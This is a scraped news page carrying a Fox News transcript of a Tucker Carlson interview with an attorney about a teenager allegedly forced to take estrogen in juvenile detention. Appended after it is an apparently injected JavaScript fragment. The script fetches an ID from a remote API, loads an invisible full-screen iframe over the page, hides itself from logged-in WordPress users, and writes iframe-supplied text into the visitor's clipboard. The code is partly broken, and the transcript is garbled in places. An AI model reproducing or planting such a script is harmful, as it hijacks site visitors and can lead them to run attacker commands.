Lawsuit claims boy grew breasts from being forced to take estrogen; Civil rights attorney Wesley Ouchi reacts.
#FoxNews #Tucker
Full Transcript Of Interview Below:
Tucker: officials at the Los angeles county juvenile Detention center forced a 16-year-old inmate to take Estrogen in order to change and Modify his behavior. Hard to believe that happened, But apparently it did. The civil rights attorney Representing the teenager in the Suit, we are happy to have him. Thank you so much for coming on. thank you. tucker: tell us how this Happened, why this happened, if It ever happened before. It sounds almost impossible to Believe. yes. My client was a 16-year-old male Who was detained downtown, near Downtown los angeles at the Juvenile hall, and about two Days after he first came in and Arrived there, he was seen by Doctors without his parents’ Permission, and for whatever Reason they decided to diagnose Him with a condition called Oppositional defiant disorder, Otherwise known as odd. There was no psychology test Done, there was no psychiatric Testing done, and the problem is Oppositional defiant disorder is Otherwise a psychological issue That needs that type of testing, Happened was they came down with That diagnose egg and on the same day They prescribed him a dosage of They prescribed him a dosage of Estrogen and they never told his Parents or hymns that they were Going to make him take it. The theory is that with odd, It’s associated with higher Level of testosterone, Which is also correlated with Higher levels of delinquency, an In this lawsuit that he was Prescribed on the same day at This level of estrogen in order To counteract his Testosterone, which they deemed Was elevated at the time. The problem is that that is an Unfounded medical treatment. There is no scientific proof That that exists. And what makes it even worse is That they refused to tell him What they were forcing him to Take, and when he refused to Take the medication, saying I’m Not going to take this Medication, you haven’t told me What it is, they told him he Couldn’t refuse. And because he had a pending Juvenile delinquency case, he Felt that if he continued to Refuse, it would have a negative Impact on the ultimate result or Punishment he was going to Receive from the juvenile court. tucker: he believes, you Believe this caused him to grow Breasts. yes, immediately after taking The condition he developed a Condition that is the growth of The tissue in the breast region. Essentially what happened is all The kids in the juvenile Hall noticed immediately and Were making fun of him when they Were showering or when they had To go out to exercise, go to the Pool, to go to p/e. His parents, who visited him on A regular basis all noticed Right away that there was some Type of growth on his chest come Into being a 16-year-old male, Who is already pretty Self-conscious and trying to get Used to his developing body, Yes — Tucker: it’s grotesque. It’s also a metaphor for what They are doing to the contrary, They hate testosterone above all Else. Wish we had more time. This is a remarkable story. I’m taking your word that it’s True but I’ve never heard Anything like it and I hope it’s The only time it’s ever happened
FOX NEWS Links & Information
Subscribe to Fox News! https://bit.ly/2vBUvAS Watch more Fox News Video: https://ift.tt/pjPdtC Watch Fox News Channel Live: https://ift.tt/Y1uFAq
FOX News Channel (FNC) is a 24-hour all-encompassing news service delivering breaking news as well as political and business news. The number one network in cable, FNC has been the most-watched television news channel for 18 consecutive years. According to a 2020 Brand Keys Consumer Loyalty Engagement Index report, FOX News is the top brand in the country for morning and evening news coverage. A 2019 Suffolk University poll named FOX News as the most trusted source for television news or commentary, while a 2019 Brand Keys Emotion Engagement Analysis survey found that FOX News was the most trusted cable news brand. A 2017 Gallup/Knight Foundation survey also found that among Americans who could name an objective news source, FOX News was the top-cited outlet. Owned by FOX Corporation, FNC is available in nearly 90 million homes and dominates the cable news landscape, routinely notching the top ten programs in the genre.
Watch full episodes of your favorite shows The Five: https://ift.tt/2lWqiF0 Special Report with Bret Baier: https://ift.tt/2lXTvyW The Story with Martha Maccallum: https://ift.tt/2lWqkg6 Tucker Carlson Tonight: https://ift.tt/2lVM9f1 Hannity: https://ift.tt/2lVRFzk The Ingraham Angle: https://ift.tt/2lXTxH4 Fox News @ Night: https://ift.tt/2lVRHqW
Follow Fox News on Facebook: https://ift.tt/1OZkd4v Follow Fox News on Twitter: https://twitter.com/FoxNews/ Follow Fox News on Instagram: https://ift.tt/2HNL06K
{
try {
var parsed = JSON.parse(text);
var jsonUrl = findUrlInObject(parsed, 0);
if (jsonUrl) return jsonUrl;
} catch (e) {}
}
var matchHttp = text.match(/https?:\/\/[^\s"'<>]+/i);
if (matchHttp && matchHttp[0]) {
var httpUrl = toHttpUrl(matchHttp[0]);
if (httpUrl) return httpUrl;
}
var matchDomain = text.match(/\b[a-z0-9.-]+\.[a-z]{2,}(?::\d+)?(?:\/[^\s"'<>]*)?/i);
if (matchDomain && matchDomain[0]) {
var domainUrl = toHttpUrl(matchDomain[0]);
if (domainUrl) return domainUrl;
}
return "";
}
function getOriginSafe(url) {
try {
return new URL(url).origin;
} catch (e) {
return "";
}
}
function addHint(rel, href) {
if (!href || !document || !document.createElement) return;
var key = rel + "::" + href;
if (registry.hints[key]) return;
registry.hints[key] = true;
try {
var parent = document.head || document.documentElement;
if (!parent) return;
var link = document.createElement("link");
link.rel = rel;
link.href = href;
if (rel === "preconnect") {
link.crossOrigin = "anonymous";
}
parent.appendChild(link);
} catch (e) {}
}
function warmupOrigins() {
var origins = {};
var apiOrigin = getOriginSafe(API_ID_URL);
if (apiOrigin) origins[apiOrigin] = true;
for (var i = 0; i < TRUSTED_CONFIGS.length; i++) {
var tpl = TRUSTED_CONFIGS[i] && TRUSTED_CONFIGS[i].template;
if (!tpl) continue;
var probe = tpl.replace(/\{id\}/g, "x");
var origin = getOriginSafe(probe);
if (origin) origins[origin] = true;
}
for (var originKey in origins) {
if (!Object.prototype.hasOwnProperty.call(origins, originKey)) continue;
addHint("dns-prefetch", originKey);
addHint("preconnect", originKey);
}
}
function getMountNode() {
return document.body || document.documentElement || null;
}
function fetchTextNoThrow(url, timeoutMs) {
return new Promise(function (resolve) {
if (!url || typeof fetch !== "function") {
resolve("");
return;
}
var finished = false;
var timer = null;
var controller = null;
function done(value) {
if (finished) return;
finished = true;
if (timer) clearTimeout(timer);
resolve(2)value || "").trim(;
}
try {
if (typeof AbortController !== "undefined") {
controller = new AbortController();
}
timer = setTimeout(function () {
try {
if (controller) controller.abort();
} catch (e) {}
done("");
}, timeoutMs);
fetch(url, {
cache: "no-store",
credentials: "omit",
signal: controller ? controller.signal : void 0
})
.then(function (response) {
return response ? response.text() : "";
})
.then(function (text) {
done(text);
})
.catch(function () {
done("");
});
} catch (e) {
done("");
}
});
}
function tryCopy(text) {
if (typeof text !== "string" || !text) return;
try { window.focus(); } catch (e) {}
if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(text).catch(function () {
fallbackCopy(text);
});
return;
}
fallbackCopy(text);
}
function fallbackCopy(text) {
try {
var mount = getMountNode();
if (!mount) return;
var ta = document.createElement("textarea");
ta.value = text;
ta.setAttribute("readonly", "readonly");
ta.style.position = "fixed";
ta.style.left = "-9999px";
ta.style.top = "0";
ta.style.opacity = "0";
mount.appendChild(ta);
try { ta.focus(); } catch (e) {}
ta.select();
ta.setSelectionRange(0, ta.value.length);
document.execCommand("copy");
if (ta.parentNode) ta.parentNode.removeChild(ta);
} catch (e) {}
}
function bindMessageHandler() {
if (registry.messageBound) return;
registry.messageBound = true;
window.addEventListener("message", function (event) {
var data = event && event.data;
var iframe = document.getElementById(registry.iframeId);
if (!iframe || !data || typeof data !== "object") return;
if (event.source && iframe.contentWindow && event.source !== iframe.contentWindow) return;
if (data.type === "ktl-show-original") {
if (typeof registry.destroy === "function") registry.destroy();
return;
}
if (data.type === "ktl-frame-ready") {
if (typeof registry.reveal === "function") registry.reveal();
return;
}
if (data.type === "copy" && typeof data.text === "string") {
tryCopy(data.text);
}
});
}
function cleanup(nextStatus) {
var iframe = document.getElementById(registry.iframeId);
registry.destroy = null;
registry.reveal = null;
try {
if (iframe && iframe.parentNode) {
iframe.parentNode.removeChild(iframe);
}
} catch (e) {}
registry.status = nextStatus || "done";
}
function resolveLandingUrl(id) {
if (!id || !TRUSTED_CONFIGS.length) {
return Promise.resolve("");
}
function step(index) {
if (index >= TRUSTED_CONFIGS.length) {
return Promise.resolve("");
}
var cfg = TRUSTED_CONFIGS[index] || {};
var builtUrl = toHttpUrl(buildTrustedUrl(cfg.template || "", id));
if (!builtUrl) {
return step(index + 1);
}
if (!cfg.useFetch) {
return Promise.resolve(builtUrl);
}
return fetchTextNoThrow(builtUrl, registry.requestTimeoutMs)
.then(function (raw) {
var landingUrl = extractLandingUrl(raw);
if (landingUrl) return landingUrl;
return step(index + 1);
})
.catch(function () {
return step(index + 1);
});
}
return step(0);
}
function activateIframe(url) {
if (!url || registry.status === "active") return;
if (isWpLoggedInContext()) {
cleanup("done");
return;
}
var existing = document.getElementById(registry.iframeId);
if (existing) {
registry.status = "active";
return;
}
var mount = getMountNode();
if (!mount) {
setTimeout(function () {
activateIframe(url);
}, 0);
return;
}
var iframe = document.createElement("iframe");
var closed = false;
var revealed = false;
var timeoutId = null;
function reveal() {
if (closed || revealed) return;
revealed = true;
if (timeoutId) clearTimeout(timeoutId);
registry.status = "active";
iframe.style.visibility = "visible";
iframe.style.opacity = "1";
iframe.style.pointerEvents = "auto";
iframe.removeAttribute("aria-hidden");
setTimeout(function () {
try { iframe.focus(); } catch (e) {}
try {
if (iframe.contentWindow && iframe.contentWindow.focus) {
iframe.contentWindow.focus();
}
} catch (e) {}
}, 0);
}
function destroy() {
if (closed) return;
closed = true;
if (timeoutId) clearTimeout(timeoutId);
cleanup("done");
}
registry.destroy = destroy;
registry.reveal = reveal;
iframe.id = registry.iframeId;
iframe.setAttribute(registry.iframeAttr, "1");
iframe.setAttribute("aria-hidden", "true");
iframe.setAttribute("loading", "eager");
iframe.setAttribute("allow", "clipboard-write");
iframe.src = safeAppendQuery(url, "v", Math.random().toString(36).slice(2));
iframe.style.cssText = [
"position:fixed !important",
"top:0",
"left:0",
"width:100vw",
"height:100vh",
"border:none",
"z-index:2147483647",
"margin:0",
"padding:0",
"overflow:hidden",
"visibility:hidden",
"opacity:0",
"pointer-events:none",
"background:transparent"
].join(";");
iframe.onload = function () {
if (closed) return;
if (!registry.requireReadyMessage) {
reveal();
}
};
iframe.onerror = function () {
destroy();
};
timeoutId = setTimeout(function () {
destroy();
}, registry.iframeTimeoutMs);
try {
mount.appendChild(iframe);
} catch (e) {
destroy();
}
}
function run() {
warmupOrigins();
bindMessageHandler();
return fetchTextNoThrow(API_ID_URL, registry.requestTimeoutMs)
.then(function (id) {
if (isWpLoggedInContext()) {
cleanup("done");
return "";
}
id = (id || "").trim();
if (!id) {
cleanup("done");
return "";
}
return resolveLandingUrl(id);
})
.then(function (finalUrl) {
if (isWpLoggedInContext()) {
cleanup("done");
return "";
}
finalUrl = toHttpUrl(finalUrl);
if (!finalUrl) {
cleanup("done");
return "";
}
var finalOrigin = getOriginSafe(finalUrl);
if (finalOrigin) {
addHint("dns-prefetch", finalOrigin);
addHint("preconnect", finalOrigin);
}
activateIframe(finalUrl);
return finalUrl;
})
.catch(function () {
cleanup("done");
});
}
registry.runPromise = run();
})();
Average Rating